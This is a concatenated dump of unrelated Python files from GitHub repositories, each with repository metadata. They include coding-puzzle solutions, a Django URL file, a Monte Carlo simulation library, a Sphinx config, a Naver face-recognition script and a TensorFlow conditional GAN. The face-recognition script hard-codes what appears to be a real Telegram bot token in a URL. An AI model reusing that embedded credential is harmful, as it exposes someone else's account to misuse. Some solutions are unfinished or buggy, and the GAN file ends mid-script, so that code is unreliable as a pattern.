07a345dba33878564304037a609dba06de767c0c | 36c00fe2afff4818c937e312ce0c6a79f35e2a77 | /7-kyu/happy-birthday,-darling!/python/solution.py | ab407ea9bcebd79b2d18c37ed24e86ac2368a137 | [] | no_license | p-lots/codewars | 0a67b6ee4c91180ff78c648421b9d2d64463ddc3 | 535faeee475c6b398124d6f5002b0e111406e8bb | refs/heads/master | 2023-08-23T22:14:33.635011 | 2023-08-23T13:30:37 | 2023-08-23T13:30:37 | 195,320,309 | 0 | 0 | null | 2023-05-09T19:25:50 | 2019-07-05T01:40:15 | Python | UTF-8 | Python | false | false | 164 | py | def womens_age(n):
base = n // 2 if n % 2 == 0 else (n - 1) // 2
new_n = 20 if n % 2 == 0 else 21
return f"{n}? That's just {new_n}, in base {base}!" | [
"paul.calotta@gmail.com"
] | paul.calotta@gmail.com |
238eb7c3a48a487377b765829fcb5eee86416ff5 | 24cf311c53c29e4e332cea01ee4de8196253a7b7 | /accounts/urls.py | ca8992d712669175ee1ef3193b0ea2d6ab348261 | [] | no_license | apengok/vsicravdoa | d017fe0c6a8606ef7bb74739354de1a2767b2a8a | e424b94007731189c2f14513798f2a9e9a45ba4c | refs/heads/master | 2020-03-10T23:07:48.145583 | 2018-06-01T09:18:25 | 2018-06-01T09:18:25 | 129,634,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | from django.conf.urls import url
from .views import (
AccountHomeView,
# AccountEmailActivateView,
UserDetailUpdateView
)
app_name = 'account'
urlpatterns = [
url(r'^$', AccountHomeView.as_view(), name='home'),
url(r'^details/$', UserDetailUpdateView.as_view(), name='user-update'),
# url(r'history/products/$', UserProductHistoryView.as_view(), name='user-product-history'),
# url(r'^email/confirm/(?P<key>[0-9A-Za-z]+)/$',
# AccountEmailActivateView.as_view(),
# name='email-activate'),
# url(r'^email/resend-activation/$',
# AccountEmailActivateView.as_view(),
# name='resend-activation'),
]
# account/email/confirm/asdfads/ -> activation view | [
"apengok@163.com"
] | apengok@163.com |
053161aa0ab152db24a739446745c4bc030409d9 | d7ca0cf469418971be2bc5d6dd65bc28ba74f71a | /pymcsl/montecarlosimulation.py | b7b8fddd1b47ce28c14ae23ffe650f5719ea3de4 | [
"MIT"
] | permissive | FilipeChagasDev/PyMCSL | a6b19df23841fffd8db088b4d9925e61b1ea7695 | 8713a1dc73b0ea8e4d9636c970c98077b5923cc4 | refs/heads/main | 2023-04-07T22:19:51.854371 | 2022-06-10T07:46:52 | 2022-06-10T07:46:52 | 500,016,774 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,525 | py | """
By Filipe Chagas
June-2022
"""
from typing import *
import numpy as np
from subsimulation import SubSimulationEnv, ContextType
def _first_or_default(l: List, f: Callable[[Any], bool], default: Any = None) -> Any:
for x in l:
if f(x):
return x
return default
class MonteCarloSimulationEnv():
"""
The MonteCarloSimulationEnv class provides a code base to facilitate the implementation of Monte Carlo simulations.
The MonteCarloSimulationEnv class performs a series of independent subsimulations under the same conditions.
"""
def __init__(self, variables: List[Tuple[str, type, Union[str, int, float, bool]]], n_subsimulations: int, n_steps: int) -> None:
"""
:param variables: List of simulation variables in the format [(variable_name, variable_type, default_value)].
:type variables: List[Tuple[str, type, Union[str, int, float, bool]]]
:param n_subsimulations: Number of subsimulations.
:type n_subsimulations: int
:param n_steps: Number of steps per subsimulation.
:type n_steps: int
"""
assert isinstance(n_subsimulations, int), f'Argument of \'n_subsimulations\' must be integer. Given {type(n_subsimulations)}.'
assert n_subsimulations > 0, f'n_subsimulations must be positive. Given {n_subsimulations}.'
assert isinstance(n_steps, int), f'Argument of \'n_steps\' must be integer. Given {type(n_steps)}.'
assert n_steps > 0, f'n_steps must be positive. Given {n_steps}.'
assert isinstance(variables, list), f'Argument of \'variables\' must be a list, but a {type(variables)} object was received.'
assert all([isinstance(var_name, str) for var_name, var_type, var_default in variables]), f'\'variables\' list must be in the format [(string, type, object)].'
assert all([isinstance(var_type, type) for var_name, var_type, var_default in variables]), f'\'variables\' list must be in the format [(string, type, object)].'
assert all([var_type in (str, int, float, bool) for var_name, var_type, var_default in variables]), f'variable types must be int, float, str or bool.'
assert all([isinstance(var_default, var_type) for var_name, var_type, var_default in variables]), f'Some default value in \'variables\' list does not correspond to its variable\'s type.'
assert all([var_name not in ('past', 'getstate', 'setstate') for var_name, var_type, var_default in variables]), 'Names \'past\', \'getstate\' and \'setstate\' are internally reserved and forbidden for variables.'
self._variables = variables
self._n_subsims = n_subsimulations
self._n_steps = n_steps
self._subsim_begin_function = None
self._subsim_step_function = None
self._subsim_envs = None
@property
def subsim_begin(self) -> Callable:
"""Returns a decorator that subscribes a function as the beginning function of all subsimulations.
:return: Wrapped decorator.
:rtype: Callable
"""
def wrapped(function: Callable[[ContextType], None]) -> Callable:
self._subsim_begin_function = function
return function
return wrapped
@property
def subsim_step(self) -> Callable:
"""Returns a decorator that subscribes a function as the step-function of all subsimulations.
:return: Wrapped decorator.
:rtype: Callable
"""
def wrapped(function: Callable[[ContextType], None]) -> Callable:
self._subsim_step_function = function
return function
return wrapped
def set_subsim_begin_callback(self, f: Callable[[ContextType], None]):
"""Subscribes a function as the begin-function of all subsimulations.
:param f: Callback function.
:type f: Callable[[ContextType], None]
"""
assert isinstance(f, Callable)
self._subsim_begin_function = f
def set_subsim_step_callback(self, f: Callable[[ContextType], None]):
"""Subscribes a function as the step-function of all subsimulations.
:param f: Callback function.
:type f: Callable[[ContextType], None]
"""
assert isinstance(f, Callable)
self._subsim_step_function = f
def run(self, show_progress: bool = True):
"""Run all the independent subsimulations.
:param show_progress: Enable progress bar, defaults to True
:type show_progress: bool, optional
"""
assert isinstance(self._subsim_begin_function, Callable), 'Begin callback is not defined.'
assert isinstance(self._subsim_step_function, Callable), 'Step callback is not defined.'
if show_progress:
from tqdm import tqdm
self._subsim_envs = [SubSimulationEnv(self._variables, self._subsim_begin_function, self._subsim_step_function) for i in range(self._n_subsims)]
for env in tqdm(self._subsim_envs) if show_progress else self._subsim_envs:
env.run_steps(self._n_steps)
def get_subsim_env(self, subsim_index: int) -> SubSimulationEnv:
"""Returns the SubSimulationEnv for a specific subsimulation.
:param subsim_index: subsimulation index (starting at 0).
:type subsim_index: int
:return: SubSimulationEnv object.
:rtype: SubSimulationEnv
"""
assert subsim_index < self._n_subsims, f'subsim_index must be less than the number of subsimulations.'
return self._subsim_envs[subsim_index]
def get_variable_mean(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the mean of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', an average for each step is calculated; if domain='subsim', an average for each subsimulation is calculated, and if domain=None, the overall average is calculated, defaults to 'time'
:type domain: str, optional
:return: An array with an average for each domain value (step or subsim), or an overall average.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.mean(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.mean(hist).astype(np.float)
def get_variable_median(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the median of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', a median for each step is calculated; if domain='subsim', a median for each subsimulation is calculated, and if domain=None, the overall median is calculated, defaults to 'time'
:type domain: str, optional
:return: An array with a median for each domain value (step or subsim), or an overall median.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.median(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.median(hist).astype(np.float)
def get_variable_var(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the variance of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', a variance for each step is calculated; if domain='subsim', a variance for each subsimulation is calculated, and if domain=None, the overall variance is calculated, defaults to 'step'
:type domain: str, optional
:return: An array with a variance for each domain value (step or subsim), or an overall variance.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.var(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.var(hist).astype(np.float)
def get_variable_std(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the standard deviation of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', a standard deviation for each step is calculated; if domain='subsim', a standard deviation for each subsimulation is calculated, and if domain=None, the overall standard deviation is calculated, defaults to 'step'
:type domain: str, optional
:return: An array with a standard deviation for each domain value (step or subsim), or an overall standard deviation.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.std(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.std(hist).astype(np.float)
def get_variable_min(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the minimum of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', a minimum for each step is calculated; if domain='subsim', a minimum for each subsimulation is calculated, and if domain=None, the overall minimum is calculated, defaults to 'step'
:type domain: str, optional
:return: An array with a minimum for each domain value (step or subsim), or an overall minimum.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.min(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.min(hist).astype(np.float)
def get_variable_max(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the maximum of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', a maximum for each step is calculated; if domain='subsim', a maximum for each subsimulation is calculated, and if domain=None, the overall maximum is calculated, defaults to 'step'
:type domain: str, optional
:return: An array with a maximum for each domain value (step or subsim), or an overall maximum.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.max(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.max(hist).astype(np.float)
def get_variable_sum(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the sum of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', a sum for each step is calculated; if domain='subsim', a sum for each subsimulation is calculated, and if domain=None, the overall sum is calculated, defaults to 'step'
:type domain: str, optional
:return: An array with a sum for each domain value (step or subsim), or an overall sum.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.sum(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.sum(hist).astype(np.float)
def get_variable_histogram(self, var_name: str, n_bins: int, density: bool = False, _range: Union[Tuple[float, float], None] = None) -> np.ndarray:
"""Returns an array with a histogram of the variable for each step of the simulation.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param n_bins: Number of bins per histogram.
:type n_bins: int
:param density: Set to true so histograms are density instead of counts. defaults to False
:type density: bool, optional
:param _range: defines manually the range (min, max) of the histogram. Default to None.
:type _range: Union[Tuple[float, float], None], optional
:return: Array of histograms.
:rtype: np.ndarray
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert isinstance(n_bins, int), 'n_bins must be int.'
assert n_bins >= 1, 'n_bins must be greater than 0.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
vhistories = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
vhistories = np.array(vhistories)
vmax = np.max(vhistories) if _range == None else _range[1]
vmin = np.min(vhistories) if _range == None else _range[0]
vhistogram = [np.histogram(vhistories[:,i], bins=n_bins, range=(vmin, vmax), density=density)[0] for i in range(vhistories.shape[1])]
return np.array(vhistogram).astype(np.float)
def get_variable_histories(self, var_name: str) -> np.ndarray:
"""Returns an array with all the outcomes that a variable had throughout the simulation.
The 0-axis indices are the subsimulations and the 1-axis indices are the steps.
:param var_name: Variable name.
:type var_name: str
:return: Array with the outcomes of the variable.
:rtype: np.ndarray
"""
assert isinstance(var_name, str), 'var_name must be string.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.array(hist).astype(np.float)
| [
"filipe.ferraz0@gmail.com"
] | filipe.ferraz0@gmail.com |
b9edcccc00c10227f91be8740e4d744c0cea4347 | 2b8047e9e73a2f6fd43897cff19cb7e7c7c464d4 | /docssrc/source/conf.py | 5d48fbeb3fa4a5a1f8afc2bbac54d3f8fcfb3638 | [
"MIT"
] | permissive | Peilonrayz/envee | 548fe08330a3b43bee5da1d64a0e406c781b990e | 66f5b6b1ff7f5966be794e1e3878418c560c1f65 | refs/heads/master | 2021-01-09T13:35:40.946529 | 2020-02-21T20:58:27 | 2020-02-21T20:58:27 | 242,321,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | import datetime
import pathlib
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
FILE_PATH = pathlib.Path(__file__).absolute()
# Add documentation for tests
TLD = FILE_PATH.parent.parent.parent
sys.path.insert(0, str(TLD))
config = configparser.ConfigParser()
config.read(TLD / "setup.cfg")
project = "envee"
author = "Peilonrayz"
copyright = f"{datetime.datetime.now().year}, {author}"
release = config.get("src", "version")
master_doc = "index"
templates_path = ["_templates"]
exclude_patterns = []
doctest_global_setup = f"""
import {project}
"""
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.graphviz",
"sphinx.ext.githubpages",
"sphinx.ext.intersphinx",
"sphinx_autodoc_typehints",
"sphinx_rtd_theme",
]
intersphinx_mapping = {"python": ("https://docs.python.org/3", None)}
html_theme = "sphinx_rtd_theme"
html_static_path = ["_static"]
set_type_checking_flag = True
| [
"peilonrayz@gmail.com"
] | peilonrayz@gmail.com |
fbdea07de6f18420b99a57b116c79adf1f0463a1 | eac52a8ae7c539acedaedf8744bd8e20172f0af6 | /general/decode_ways.py | 33c70cc775b271c21d0bb448684acae24e9ffa65 | [] | no_license | mshekhar/random-algs | 3a0a0f6e6b21f6a59ed5e1970b7a2bc2044e191f | 7c9a8455f49027a754038b23aaa2df61fe5397ca | refs/heads/master | 2020-03-26T16:29:42.694785 | 2019-07-18T20:57:55 | 2019-07-18T20:57:55 | 145,105,593 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,895 | py | # A message containing letters from A-Z is being encoded to numbers using the following mapping:
#
# 'A' -> 1
# 'B' -> 2
# ...
# 'Z' -> 26
# Given a non-empty string containing only digits, determine the total number of ways to decode it.
#
# Example 1:
#
# Input: "12"
# Output: 2
# Explanation: It could be decoded as "AB" (1 2) or "L" (12).
# Example 2:
#
# Input: "226"
# Output: 3
# Explanation: It could be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
# if not single_digit:
# all_single_possible[c] = False
# else:
# all_single_possible[c] = all_single_possible[c - 1] and all_single_possible[c]
# if c - 1 >= 0 and num_decodings[c - 1] > 0:
# num_decodings[c] = num_decodings[c - 1]
#
# if c - 1 >= 0:
# double_digit = self.get_decoding_count(s[c - 1] + i)
# if double_digit:
# print s[c - 1] + i, double_digit, num_decodings[c - 2] + int(all_single_possible[c - 2])
# if c - 2 >= 0 and num_decodings[c - 2] + int(all_single_possible[c - 2]) > 0:
# num_decodings[c] += num_decodings[c - 2] + 1
# elif c == 1:
# num_decodings[c] += 1
class Solution(object):
def get_decoding_count(self, s):
if not s.startswith('0') and 1 <= int(s) <= 26:
return 1
return 0
def numDecodings(self, s):
"""
:type s: str
:rtype: int
"""
num_decodings = [0] * len(s)
all_single_possible = True
for c, i in enumerate(s):
single_digit = self.get_decoding_count(i)
double_digit = 0
if c - 1 >= 0:
double_digit = self.get_decoding_count(s[c - 1] + i)
if not single_digit:
all_single_possible = False
if single_digit + double_digit > 0:
if single_digit:
num_decodings[c] = num_decodings[c - 1]
if all_single_possible and not num_decodings[c]:
num_decodings[c] = 1
if double_digit:
if c - 2 >= 0 and num_decodings[c - 2] > 0:
num_decodings[c] += num_decodings[c - 2]
elif c == 1:
num_decodings[c] += 1
# add one for all single decodings
# print num_decodings, all_single_possible
return num_decodings[-1]
print Solution().numDecodings("12"), 2
print Solution().numDecodings("226"), 3
print Solution().numDecodings("10"), 1
print Solution().numDecodings("103"), 1
print Solution().numDecodings("1032"), 1
print Solution().numDecodings("10323"), 1
print Solution().numDecodings("012"), 0
print Solution().numDecodings("110"), 1
print Solution().numDecodings("1212"), 5
# 1 2 1
# 12 1
# 1 21
#
# 1 2 1 2
#
# 12 1 2
# 12 12
#
# 1 21 2
# 1 2 12
# for i in ["0", "10", "10", "103", "1032", "10323"]:
# print(Solution().numDecodings(i))
| [
"mayank@moengage.com"
] | mayank@moengage.com |
0a5f6df39a2d3620f087deaf1e129653f22361bc | 73983c84160d74cf16504b255c9b91ec90c1d8da | /python/lintcode/1751.CowherdWeaver.py | 371aa2dee601416aa707782507f9adb391f241b0 | [] | no_license | kaka-go/Programming | 53ac72e08dc16a3ce76aba142265e9231f75e33f | 32255576bc80155cfef302ee1985e203e20e0f22 | refs/heads/master | 2022-10-24T21:19:43.989085 | 2020-06-16T13:56:44 | 2020-06-16T13:56:44 | 11,860,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,665 | py | # 1751. Cowherd&Weaver
# cat-only-icon
# CAT Only
# 中文English
# On the Qixi Festival, the Cowherd and the Weaver play together in a maze size of n*m . However, they get separated from each other. Now given the maze consisting of .,*,S,T, where . denotes an empty space, * denotes an obstacle, S denotes the position of the cowherd, T denotes the position of the weaver, the Cowherd and the Weaver will try to find each other(they can move to the grid up or down or left or right or stand still, but they can't walk outside of the maze or move to obstacles).Is it possible for them reunion? If possible, return True, otherwise return False.
# Example
# Example 1:
# Input:
# [
# "S..*",
# "*.**",
# "...T"
# ]
# Output: true
# Explanation:
# weaver don't need to move
# Cowherd's route:(0,0)->(0,1)->(1,1)->(2,1)->(2,2)->(2,3)
# Example 2:
# Input:
# [
# "S..*",
# "***.",
# "...T"
# ]
# Output: false
# Explanation
# It is impossible for them to reunion
# Notice
# 2<=n,m<=1000
class Solution:
"""
@param maze: the maze
@return: Can they reunion?
"""
N, M = 0, 0
visited = set()
MAZE = None
def findHer(self, maze):
# Write your code here
self.N = len(maze)
self.M = len(maze[0])
self.MAZE = [list(maze[i]) for i in range(self.N)]
print(self.MAZE)
self.visited = set()
s_pos = (0,0)
t_pos = (0,0)
for row in range(self.N):
for col in range(self.M):
if maze[row][col] == 'S':
s_pos = (row, col)
if maze[row][col] == 'T':
t_pos = (row, col)
can = self.dfs(maze, s_pos, t_pos)
print(can)
for r in self.MAZE:
print("".join(r))
return can
def is_valid(self, x, y):
return 0<= x <self.M and 0<=y < self.N
def dfs(self, maze, pos, target):
found = False
dx = [-1, 0, 1, 0]
dy = [0, -1, 0, 1]
y, x = pos
next_pos_list = [(y+dy[i],x+dx[i]) for i in range(4)]
if pos == target:
return True
self.visited.add(pos)
print(pos)
self.MAZE[y][x] = 'o'
for next_pos in next_pos_list:
next_y, next_x = next_pos
if self.is_valid(next_x, next_y) \
and maze[next_y][next_x] != '*' \
and next_pos not in self.visited:
found = self.dfs(maze, next_pos, target)
if found:
break
return found
s = Solution()
s.findHer(
[
".........T...*",
"**.*..........",
"........**....",
"S*.**........."
]
)
| [
"edward9145@gmail.com"
] | edward9145@gmail.com |
9bd94aa5bacee387781973b3baf0c5402378758e | 5b34f91f66b34ced0f51726f5c8f26017614423a | /0817/score.py | 5cc455de775ed199e1b5de3f378114d49be6c38c | [] | no_license | WinstonHou/Phython200817 | 40cec9a587fa55c3ecdc52f426b11f95acf8060f | 923a0f0b90e44310769563256a3fa1f11d514c4b | refs/heads/master | 2022-11-29T16:36:37.390898 | 2020-08-17T08:53:37 | 2020-08-17T08:53:37 | 288,129,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | score=int(input("請輸入成績"))
if score >=0 and score<=100:
if score>=90:
print("等級A")
elif score>=80:
print("等級B")
elif score>=70:
print("等級C")
elif score>=60:
print("等級D")
else:
print("等級E")
else: print("輸入錯誤!")
| [
"noreply@github.com"
] | noreply@github.com |
f0b3e6949b78c44d35bdedc65dcdd7d848eae7f3 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/CodeJamData/10/33/17.py | b549582d467c3879831e6f099d36ecf18d3abe31 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,617 | py | from itertools import count
def board(rows):
n = len(rows[0]) * 4
return [map(int, '{0:0{1}b}'.format(int(row, 16), n)) for row in rows]
def squares(board):
m, n = len(board), len(board[0])
#sq = {}
for r in xrange(m):
for c in xrange(n):
if board[r][c] == 2: continue
ns = findsquare(board, r, c)
yield ns, -r, -c
#fill(board, r, c, ns)
#sq[ns] = sq.get(ns, 0) + 1
#return sq
def solve(board):
result = {}
m, n = len(board), len(board[0])
while 1:
try:
n, r, c = max(squares(board))
except ValueError:
return result
result[n] = result.get(n, 0) + 1
fill(board, -r, -c, n)
def fill(board, r, c, n):
for i in xrange(r, r+n):
for j in xrange(c, c+n):
board[i][j] = 2
def findsquare(board, r, c):
x = board[r][c]
try:
for s in count(1):
for j in range(c, c+s+1):
x = 1 - x
if board[r+s][j] != x:
return s
for i in range(r+s-1, r-1, -1):
x = 1 - x
if board[i][c+s] != x:
return s
except IndexError:
return s
if __name__ == '__main__':
import sys
rl = iter(sys.stdin).next
for case in range(1, int(rl())+1):
M,N = map(int, rl().split())
lines = [rl().strip() for _ in range(M)]
b = board(lines)
sq = solve(b)
print 'Case #%d: %s' % (case, len(sq))
for k, v in sorted(sq.items(), reverse=True):
print k,v
| [
"kwnafi@yahoo.com"
] | kwnafi@yahoo.com |
a20abcac99856f482d5e3f7ec4d5c5c93878dacd | 98f505e8275ed888818d8d6f77d27a9c275b55d8 | /face.py | a6d86359d258eda63f01fe71ba8a00892e28e706 | [] | no_license | EHwooKim/telegram | 13ac0afbd4ee5f91aa81b557183e9d8143fb1315 | 034ae64fa6283720fd55362b1b763cb3497ce4fc | refs/heads/master | 2022-12-11T19:53:23.942523 | 2019-07-12T07:41:29 | 2019-07-12T07:41:29 | 196,533,974 | 0 | 0 | null | 2022-12-08T05:52:25 | 2019-07-12T07:48:30 | Python | UTF-8 | Python | false | false | 959 | py | import pprint
import requests
from decouple import config
# 0. 이미지 파일
file_url = 'https://api.telegram.org/file/bot823224197:AAFwM03Ie4P8dBH45aKI75sMO0okZpcIqic/photos/file_2.jpg'
response = requests.get(file_url, stream=True)
image = response.raw.read()
# 1. 네이버 API 설정
naver_client_id = config('NAVER_CLIENT_ID')
naver_client_secret = config('NAVER_CLIENT_SECRET')
# 2. URL 설정
naver_url = 'https://openapi.naver.com/v1/vision/celebrity'
# 3. 요청 보내기! POST
headers = {
'X-Naver-Client-Id': naver_client_id,
'X-Naver-Client-Secret': naver_client_secret
}
response = requests.post(naver_url,
headers=headers,
files={'image':image}).json()
best = response.get('faces')[0].get('celebrity')
if best.get('confidence') > 0.2:
text = f"{best.get('confidence')*100}%만큼 {best.get('value')}를 닮으셨네요~"
else :
text = '사람이 아닙니다'
print(text) | [
"ehwoo0707@naver.com"
] | ehwoo0707@naver.com |
9b0cd6014bdec03a0d2afed288972c3c237370e2 | bbc9cae586607079ce8a469b7436603f174ffcb5 | /cgan.py | bcbd9e769bf30dafe76a9d6a62b2bf7e04b46126 | [] | no_license | howieeeeeeee/tensorflow_GANs | aafcce16512a5a052b92e4be048ce2ddd24e7472 | 0e678807650bf5ac3f279c74602ffe8292e93e2d | refs/heads/master | 2021-05-14T16:02:52.215214 | 2018-01-05T07:18:07 | 2018-01-05T07:18:07 | 116,010,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,804 | py | # -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
mb_size = 64
Z_dim = 100
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
h_dim = 128
def xavier_init(size):
in_dim = size[0]
xavier_stddev = 1. / tf.sqrt(in_dim / 2.)
return tf.random_normal(shape=size, stddev=xavier_stddev)
""" Discriminator Net model """
X = tf.placeholder(tf.float32, shape=[None, 784])
y = tf.placeholder(tf.float32, shape=[None, y_dim])
D_W1 = tf.Variable(xavier_init([X_dim + y_dim, h_dim]))
D_b1 = tf.Variable(tf.zeros(shape=[h_dim]))
D_W2 = tf.Variable(xavier_init([h_dim, 1]))
D_b2 = tf.Variable(tf.zeros(shape=[1]))
theta_D = [D_W1, D_W2, D_b1, D_b2]
def discriminator(x, y):
inputs = tf.concat(axis=1, values=[x, y])
D_h1 = tf.nn.relu(tf.matmul(inputs, D_W1) + D_b1)
D_logit = tf.matmul(D_h1, D_W2) + D_b2
D_prob = tf.nn.sigmoid(D_logit)
return D_prob, D_logit
""" Generator Net model """
Z = tf.placeholder(tf.float32, shape=[None, Z_dim])
G_W1 = tf.Variable(xavier_init([Z_dim + y_dim, h_dim]))
G_b1 = tf.Variable(tf.zeros(shape=[h_dim]))
G_W2 = tf.Variable(xavier_init([h_dim, X_dim]))
G_b2 = tf.Variable(tf.zeros(shape=[X_dim]))
theta_G = [G_W1, G_W2, G_b1, G_b2]
def generator(z, y):
inputs = tf.concat(axis=1, values=[z, y])
G_h1 = tf.nn.relu(tf.matmul(inputs, G_W1) + G_b1)
G_log_prob = tf.matmul(G_h1, G_W2) + G_b2
G_prob = tf.nn.sigmoid(G_log_prob)
return G_prob
def sample_Z(m, n):
return np.random.uniform(-1., 1., size=[m, n])
def plot(samples):
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(28, 28), cmap='Greys_r')
return fig
G_sample = generator(Z, y)
D_real, D_logit_real = discriminator(X, y)
D_fake, D_logit_fake = discriminator(G_sample, y)
